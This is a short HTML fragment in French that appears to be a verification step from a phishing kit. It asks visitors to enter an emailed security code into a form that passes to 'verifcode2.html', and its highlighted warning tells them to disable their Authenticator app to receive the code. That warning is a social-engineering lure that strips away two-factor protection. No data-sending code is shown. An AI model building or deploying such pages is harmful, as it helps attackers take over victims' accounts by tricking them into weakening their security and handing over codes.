<p>Vérification</p>
<p>
  Nous vous avons envoyer un mail, un code vous à été attribuer. Veuillez le
  marquer ici.
</p>
<p class="danger">
  Veuillez désactiver l'Authenticator pour recevoir le code de sécurité.
</p>
<form class="loginform" data-target="verifcode2.html">
  <div class="group-form column-lg">
    <label for="pseudo">Code de sécurité</label>
    <input type="text" name="pseudo" id="pseudo" />
  </div>
  <button id="logins" type="submit">Valider</button>
</form>
